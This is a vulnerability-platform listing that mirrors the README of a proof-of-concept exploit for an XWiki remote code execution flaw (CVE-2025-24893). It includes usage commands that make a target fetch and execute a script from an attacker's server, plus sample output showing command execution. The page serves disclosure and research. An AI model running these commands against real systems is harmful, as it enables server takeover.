漏洞平台

POC详情： d105011ef6665a10ba557be6acc1ab0772c3277b

来源

https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc

关联漏洞

标题： XWiki Platform 安全漏洞 (CVE-2025-24893)
描述：XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

描述

PoC for CVE-2025-24893

介绍

# XWiki RCE Exploit PoC (CVE-2025-24893)

## Overview
This repository contains a Proof of Concept (PoC) exploit for the **XWiki Remote Code Execution (RCE)** vulnerability identified as [CVE-2025-24893](https://github.com/advisories/GHSA-rr6p-3pfg-562j). The vulnerability allows an attacker to execute arbitrary code on a target XWiki instance by leveraging a crafted request to the SolrSearch endpoint. This script supports both HTTP and HTTPS targets.

**⚠️ Disclaimer**: This PoC is intended for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and unethical. Always obtain proper authorization before testing any system.

## Vulnerability Details
- **CVE ID**: CVE-2025-24893
- **Affected Component**: XWiki SolrSearch endpoint
- **Impact**: Remote Code Execution (RCE)
- **Advisory**: [GitHub Security Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j)

The vulnerability arises due to improper handling of user input in the SolrSearch endpoint, allowing the injection of Groovy code via a crafted payload. This PoC demonstrates how an attacker can exploit this to execute arbitrary commands on the target server.

## Prerequisites
- Python 3.x
- Required Python libraries: `requests`, `argparse`, `urllib.parse`, `re`, `html`
- A target XWiki instance vulnerable to CVE-2025-24893
- An attacker-controlled server to host the bash script, accessible via HTTP or HTTPS
- A file containing the code to be executed on the target

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
   ```
2. Install the required Python libraries:
   ```bash
   pip install requests
   ```

## Usage
The script sends a crafted HTTP/HTTPS request to the target XWiki instance, injecting a Groovy payload that executes a `curl` command to fetch and run a file from an attacker-controlled server.

Run the script with the following command:

```bash
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
```

### Arguments
- `--url`: The base URL of the target XWiki instance (e.g., `http://target` or `https://target`).
- `--server`: The IP or hostname of the attacker’s server, including the port if needed (e.g., `192.168.1.100:8080`). Supports both HTTP and HTTPS.
- `--file`: The name of the file on the attacker’s server containing the code to be executed (e.g., `exploit.sh`).
- `--no-verify`: Optional flag to disable SSL verification for HTTPS targets (use with caution, for testing only).

### Example 
```bash
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
```

To bypass SSL verification (e.g., for self-signed certificates):
```bash
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
```

This will:
1. Construct a payload that uses the Groovy script to execute a `curl` command.
2. Fetch the specified file (`exploit.sh`) from the attacker’s server (`http(s)://192.168.1.100:8080`).
3. Execute the fetched file on the target system.
4. Extract and display the output, cleaning up any HTML tags and entities.

## Output
The script extracts the response from the target, removes HTML tags (e.g., `<br/>`, `<del>`), and converts HTML entities to plain text for readability. The cleaned output is printed to the console.

## Sample
```bash
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
```

## Limitations
- The target XWiki instance must be vulnerable to CVE-2025-24893.
- The attacker’s server must be accessible from the target system via HTTP or HTTPS.
- The script assumes the target server supports the SolrSearch endpoint and Groovy execution.

## Mitigation
To protect against this vulnerability:
- Update XWiki to the latest patched version.
- Refer to the [GitHub Security Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j) for detailed mitigation steps.
- Blog to refer [CVE-2025-24893](https://www.ionix.io/blog/xwiki-remote-code-execution-vulnerability-cve-2025-24893/)

## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

文件快照


 [4.0K]  /data/pocs/d105011ef6665a10ba557be6acc1ab0772c3277b
├── [1.8K]  exploit.py
├── [   2]  exploit.sh
├── [1.0K]  LICENSE
└── [4.2K]  README.md

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。